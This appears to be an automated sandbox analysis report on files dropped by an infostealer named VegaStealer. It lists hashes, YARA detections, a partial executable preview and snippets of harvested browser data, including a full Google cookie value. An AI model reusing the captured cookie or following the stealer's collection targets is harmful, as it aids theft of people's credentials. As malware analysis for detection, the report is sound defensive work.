                                                                                                                                                                                                                                    SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):278016
                                                                                                                                                                                                                                    Entropy (8bit):5.887323139606271
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6144:qmYKJMVRp9hnmy0UYU9B93YUnLbB62X3Rb36h3YQ:ZJ0Rp9hzL82ghIQ
                                                                                                                                                                                                                                    MD5:3F62213D184B639A0A62BCB1E65370A8
                                                                                                                                                                                                                                    SHA1:BBF50B3C683550684CDB345D348E98FBE2FCAFE0
                                                                                                                                                                                                                                    SHA-256:C692DFC29E70A17CABC19561E8E2662E1FE32FDBA998A09FE1A8DC2B7E045B34
                                                                                                                                                                                                                                    SHA-512:0CD40D714E6A6EBD60CC0C8B0E339905A5F1198A474A531B1794FB562F27053F118718CC68B9652FEF3411906F9D8AD22D0253AF256FA1922133E9907298E803
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_NitroStealer, Description: Yara detected Nitro Stealer, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_BlackGuard, Description: Yara detected BlackGuard, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_VEGAStealer, Description: Yara detected VEGA Stealer, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_AdesStealer, Description: Yara detected Ades Stealer, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: infostealer_win_lighting, Description: Detect the Lighting infostealer based on specific strings, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Sekoia.io
                                                                                                                                                                                                                                    • Rule: infostealer_win_stormkitty, Description: Finds StormKitty samples (or their variants) based on specific strings, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Sekoia.io
                                                                                                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: ditekSHen
                                                                                                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: ditekSHen
                                                                                                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: ditekSHen
                                                                                                                                                                                                                                    • Rule: MALWARE_Win_A310Logger, Description: Detects A310Logger, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: ditekSHen
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...tq................0..4..........J,... ...`....@.. ....................................`..................................+..O....`...............................+............................................... ............... ..H............text...@2... ...4.................. ..`.rsrc........`.......6..............@..@.reloc...............<..............@..B................,,......H...........D6..........$+................................................(%...*..(%...*.0..........s....o....t....o&....8......('....r...p......%..o.....%..o.....%..o..........%..o.....%..o.....((....~....rC..p()....(*.....&~....r...p()....(*.....~.....X.......(+...:n.............o.......&r...p(,.....*.(....e..|...............................0..........s(...o-...t....o-....8......(.....r...p......%..o.....%..o.....%..o..........%..o.....%..o.....((....~....r...p()....(*.....
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):105
                                                                                                                                                                                                                                    Entropy (8bit):3.8863455911790052
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
                                                                                                                                                                                                                                    MD5:2E9D094DDA5CDC3CE6519F75943A4FF4
                                                                                                                                                                                                                                    SHA1:5D989B4AC8B699781681FE75ED9EF98191A5096C
                                                                                                                                                                                                                                    SHA-256:C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
                                                                                                                                                                                                                                    SHA-512:D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):94
                                                                                                                                                                                                                                    Entropy (8bit):4.886397362842801
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
                                                                                                                                                                                                                                    MD5:61CDD7492189720D58F6C5C975D6DFBD
                                                                                                                                                                                                                                    SHA1:6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
                                                                                                                                                                                                                                    SHA-256:2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
                                                                                                                                                                                                                                    SHA-512:20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):289
                                                                                                                                                                                                                                    Entropy (8bit):5.76524051718901
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6:Pk3rcDxbuQ03r4KcsGG1NOpFw+5uQ+Cy8HfyUhEqXfL6vRpAy:c7EEQ074KcW1NOpFwUuQLHaU9WvH9
                                                                                                                                                                                                                                    MD5:B11F445211C21DB45D7B779A5C6E2444
                                                                                                                                                                                                                                    SHA1:27641DD5D8824CD6596FB862681846DAE17A8BBB
                                                                                                                                                                                                                                    SHA-256:11CB0CB1CC5B9BAF4FFB0F950F667FBCC688979D5096DEDCE9883242990955FC
                                                                                                                                                                                                                                    SHA-512:A504B9E59E392209298C2E3113FB06DF75167FD2B36D69BA408BC6BA682D47F015656B06AE270928A7BEF685705E28C20E85786B53DFC308F6952984EA6FC2A0
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.google.com.TRUE./.FALSE.13343492415760663.1P_JAR.2023-10-04-13...google.com.TRUE./.FALSE.13356711615760707.NID.511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4..
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.704346314649071
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                                                                                                                                                                    MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                                                                                                                                                                    SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                                                                                                                                                                    SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                                                                                                                                                                    SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.704346314649071
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                                                                                                                                                                    MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                                                                                                                                                                    SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                                                                                                                                                                    SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                                                                                                                                                                    SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.6959554225029665
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                                                                                                                                                                    MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                                                                                                                                                                    SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                                                                                                                                                                    SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                                                                                                                                                                    SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.690071120548773
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
                                                                                                                                                                                                                                    MD5:8F49644C9029260CF4D4802C90BA5CED
                                                                                                                                                                                                                                    SHA1:0A49DD925EF88BDEA0737A4151625525E247D315
                                                                                                                                                                                                                                    SHA-256:C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
                                                                                                                                                                                                                                    SHA-512:CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.696724055101702
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:amL3nXTtZkQxqip7hViX2Zka12//5V9PP+Iw5ZrfqoV2P8S7FpwmKxlTn:xXL4ivV62qaI/xVhVWZ+X8SxKDT
                                                                                                                                                                                                                                    MD5:1FFF6A639C738561CDC01BD436BA77C1
                                                                                                                                                                                                                                    SHA1:BAFB1D68D43B177330F701BA01CA1AD19CB4FBB8
                                                                                                                                                                                                                                    SHA-256:C2279E62766B7EFD46442641AECB3D9A0A25CE999296AC5BA9DA7BF18B2BDA92
                                                                                                                                                                                                                                    SHA-512:65EFD5B1E235EF6AD917EAF95E16E3287CA9720F3F0EE989667A1DBB651693580415182F64FFA7538986E2BE7F19AC030836DF62489BB49C42383F5FCD3FA5D2
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:NWCXBPIUYIVIMEKOECOAETPCBVGOLLFSFYSIEWGCQXXYDTHBXCBBHRPJYJIIAKLIVVLYHTWFXTIMRQKNXJVKYWJRGDPRAMVTWAMYMVUPBCODOHNWGVUTTMDRCGQSWUENMIVFDVUFWRBWWAXFGLJCWHJESVSORVMBBPZHMGNOLAZEBTVVZJSGFZDCEBOKEELVIKVUJUJMYXSQXAWBVPYELDJUPEKNZGLXBNUDAABLCYAZVPQYBYHWASQZIKCOZDJXTSUXLKTDHJGSYIZZEGRZZNKKDUJMXSRWEDSBIZWRCWGJILNJNQKYISXAGNMQIWLOTRVEMVUEFFBMOVSUOJIHGLPPIKHURRWPPLYGZVGPLTDDNFHWCGDYBJWXDCKVHBTKZNVCGFMGAYMEPNBBZNTBERBXWUZQOWOXLEBSIXOWEZFEHNZYOEPBPYERLPMITANPJUDWNRNURGGOVPAFPUMUFAJJGHCGGSHCPAKCRSPZJJODRADCRCMYZDUAIWBDBDCPBUYVIRSRMZFDRIJQLLRUECYTILJEKDTTKMJATFJZGEOYRXTQSNGOENKASOPKMGWIWBAOMVIDHMXGNZFQLDKEJHBNZOCNFNIXNHOKWJNDTYAWGDGLYPWBQMSVSXTAECOYAEULSBSJPKKFQWDJACOZKJGANAIJBUMCLKLMRCAXPGXPFJMMBITWGGANYVNUIAJQWHHSWFPPASKHZAUXVZCDBKOWYHZAGAZKRYAWMXNYMSOVNKLUSFMEKYZMJTXYMLLTDLXXHKEEHBYXXFBEBTALQHMYPVOGJLATHUICOJIIQJINSCWPMNRVRLYYRHLAJBLVHEDYTFSDAVKINLNNEEURYKXHNXJMZIQWVOJNOTKRUWHSVTMXWRNJWLJJHPIPSFMIAIWBMNDXXCXXZCPDOKGRINVUVYHCJLFDJIZCOEFTHTRHTIWRPLTKLXPUDEBCIHBMDJOHZRRRYIUNRRIECVWDGMFRWLRMKDBNVTLGPDQC
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.692990330209164
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                                                                                                                                                                                                    MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                                                                                                                                                                                                    SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                                                                                                                                                                                                    SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                                                                                                                                                                                                    SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.690071120548773
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
                                                                                                                                                                                                                                    MD5:8F49644C9029260CF4D4802C90BA5CED
                                                                                                                                                                                                                                    SHA1:0A49DD925EF88BDEA0737A4151625525E247D315
                                                                                                                                                                                                                                    SHA-256:C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
                                                                                                                                                                                                                                    SHA-512:CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
                                                                                                                                                                                                                                    Malicious:false
